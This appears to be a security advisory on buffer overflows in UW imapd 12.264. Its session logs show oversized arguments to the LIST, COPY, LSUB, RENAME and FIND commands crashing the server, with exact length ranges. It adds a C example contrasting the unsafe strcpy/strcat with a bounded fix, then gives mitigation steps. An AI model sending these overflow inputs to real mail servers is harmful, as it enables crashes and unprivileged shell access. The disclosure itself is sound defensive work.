

Vulnerability
 imapd
Affected
 imapd4r1 v12.264 (imap-4.7 package from the UW)
Description
 Michal Zalewski found the following on the newest Red Hat (RH):
 OK nimue IMAP4rev1 v12.264 server ready
 1 login lcamtuf test
 1 OK LOGIN completed
 1 list "" AAAAAAAAAAAAAAAAAAAAAAAAAAA...[yes, a lot of 'A's ;]
 Program received signal SIGSEGV, Segmentation fault.
 0x41414141 in ?? ()
 Privileges seem to be dropped, but anyway it's a nice way to get
 shell access to a mail account, maybe grab some data from memory,
 etc. It is believed both the imap and ipopd packages need a code
 security audit.
 To segfault, the number of A's has to be in the range 1023 < #A <
 8180. If the command line including CR/LF is longer than 8192 bytes,
 an error message is displayed. The segfaults are in the nntp, mh,
 news and dummy drivers. In all modules the subroutine
 <name>_canonicalize will happily strcpy and strcat the user-
 supplied arguments to fixed-size buffers, normally of
 MAILTMPLEN = 1024 bytes. The older version, imap-4.5-4, seems to be OK.
 Here's another buffer overflow in imapd. This time the security flaw
 exists in the standard RFC 1064 COPY command:
 OK mail IMAP4rev1 v12.264 server ready
 login siva9 secret
 OK LOGIN completed
 select inbox
 2 EXISTS
 0 RECENT
 OK [UIDVALIDITY 956162550] UID validity status
 OK [UIDNEXT 5] Predicted next UID
 FLAGS (\Answered \Flagged \Deleted \Draft \Seen)
 OK [PERMANENTFLAGS (\* \Answered \Flagged \Deleted \Draft \Seen)] Permanent
 flags
 OK [UNSEEN 2] first unseen message in /var/spool/mail/siva9
 OK [READ-WRITE] SELECT completed
 copy 1 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ... [a lot of A's]
 No answer. The process has been killed by SIGSEGV. The number of A's
 must be in the range from 1017 to 8180. After LOGIN all privileges
 are dropped, but we still have the possibility of getting unprivileged
 shell access. This was tested against UW imapd v10.223, v11.241,
 v12.250, v12.261 and v12.264.
 Here come yet another three buffer overruns. This time the
 affected commands are LSUB, RENAME and FIND:
 OK mail IMAP4rev1 v12.264 server ready
 login siva9 secret
 OK LOGIN completed
 lsub "" AAAAAAAAAAAAA.... (#A 1024 - 8179)
 SIGSEGV received.
 OK localhost IMAP4rev1 v12.264 server ready
 login siva9 secret
 OK LOGIN completed
 rename inbox AAAAAAAAAAAAA.... (#A 1021 - 8174)
 SIGSEGV received.
 OK localhost IMAP4rev1 v12.264 server ready
 login siva9 secret
 OK LOGIN completed
 find all.mailboxes AAAAAAAAAAAAA.... (#A 1026 - 8168)
 SIGSEGV received.
 It seems that all two-argument commands in the authenticated state,
 where the second argument is a string, are vulnerable. ipop2d/ipop3d
 work fine in all states, including the transaction state.
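 The following is an added example, not UW imapd source code, that models the
 pattern the advisory describes for LIST above and for the other two-argument
 commands here: a reference and a mailbox name/pattern are strcpy'd and
 strcat'd into a fixed MAILTMPLEN (1024 byte) buffer in the <driver>_canonicalize
 routines. It shows that shape beside a bounded replacement and a probe that
 reproduces the 1023/1024 boundary for LIST "" with a run of 'A's. MAILTMPLEN
 and the 8192-byte line limit are the values quoted in the advisory; the
 function names (unsafe_canonicalize, safe_canonicalize, fits_in_tmp,
 probe_list_pattern) are hypothetical.

```c
#include <stdio.h>
#include <string.h>

/* Added example, not UW imapd source. MAILTMPLEN matches the value quoted in
 * the advisory; MAX_LINE is the longest command line it says the server
 * accepts. All function names are hypothetical. */
#define MAILTMPLEN 1024
#define MAX_LINE   8192

/* The bug as the advisory describes it: reference and pattern are joined into
 * a fixed MAILTMPLEN buffer with no length check. Kept only to show the
 * pattern; nothing in this file calls it with an oversized argument. */
static void unsafe_canonicalize(char *tmp, const char *ref, const char *pat)
{
    strcpy(tmp, ref);   /* reference copied unbounded */
    strcat(tmp, pat);   /* pattern appended unbounded: writes past tmp once
                           strlen(ref) + strlen(pat) + 1 > MAILTMPLEN */
}

/* The check the unsafe version lacks: does ref+pat plus the NUL fit? */
static int fits_in_tmp(const char *ref, const char *pat)
{
    return strlen(ref) + strlen(pat) + 1 <= MAILTMPLEN;
}

/* Bounded replacement: refuses input that does not fit and tells the caller,
 * rather than truncating silently or overflowing. Returns 1 on success and
 * 0 when the server should answer the client with an error instead. */
static int safe_canonicalize(char *tmp, size_t tmplen,
                             const char *ref, const char *pat)
{
    int n = snprintf(tmp, tmplen, "%s%s", ref, pat);
    if (n < 0 || (size_t)n >= tmplen) {
        tmp[0] = '\0';  /* do not leave a half-built mailbox name behind */
        return 0;
    }
    return 1;
}

/* Probe: feed the equivalent of  LIST "" A...A  (n_a times 'A') through the
 * bounded routine. Returns 1 if accepted, 0 if rejected as too long, and -1
 * if the line would exceed what the server reads at all. */
static int probe_list_pattern(size_t n_a)
{
    static char pat[MAX_LINE + 1];   /* constructed input, all 'A's */
    char tmp[MAILTMPLEN];

    if (n_a > MAX_LINE)
        return -1;
    memset(pat, 'A', n_a);
    pat[n_a] = '\0';
    return safe_canonicalize(tmp, sizeof tmp, "", pat);
}

int main(void)
{
    char tmp[MAILTMPLEN];
    size_t lens[] = { 10, 1023, 1024, 8180 };
    size_t i;

    unsafe_canonicalize(tmp, "", "INBOX");   /* short input: harmless */
    printf("unsafe_canonicalize on short input -> %s\n", tmp);

    for (i = 0; i < sizeof lens / sizeof lens[0]; i++)
        printf("LIST \"\" with %4zu x 'A': %s\n", lens[i],
               probe_list_pattern(lens[i]) == 1
                   ? "accepted" : "rejected (would overflow MAILTMPLEN)");
    return 0;
}
```

 With an empty reference the first rejected length is 1024, which is the
 first length the advisory reports as crashing for LIST (1023 < #A). The
 other commands have slightly different thresholds in the advisory because
 the driver prepends or appends its own characters before the copy; the
 fix is the same in every case, a length check before the copy and an error
 reply when it fails.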
Solution
 1) Deinstall the imap-uw port/package, if you have installed it.
 2) If you do not specifically require imap functionality (i.e.
 pop2/pop3 is sufficient) then disable the imap daemon in
 /etc/inetd.conf and restart inetd (e.g. with the command
 'killall -HUP inetd')
 Unfortunately the vulnerabilities in imapd are quite extensive and
 no patch is currently available to address them. There is also
 no "drop-in" replacement for imap-uw currently available in
 ports, although the mail/cyrus port is another imap server which
 may be a suitable replacement. Cyrus has different configuration
 and operational requirements than imap-uw however, which may make
 it unsuitable for many users.
 Until a security audit of the imap-uw source can be completed and
 the vulnerabilities patched, it is recommended that operators of
 "closed" imapd servers take steps to minimize the impact of users
 being able to run code on the server (i.e., by tightening the
 local security on the machine to minimize the damage an intruding
 user can cause).
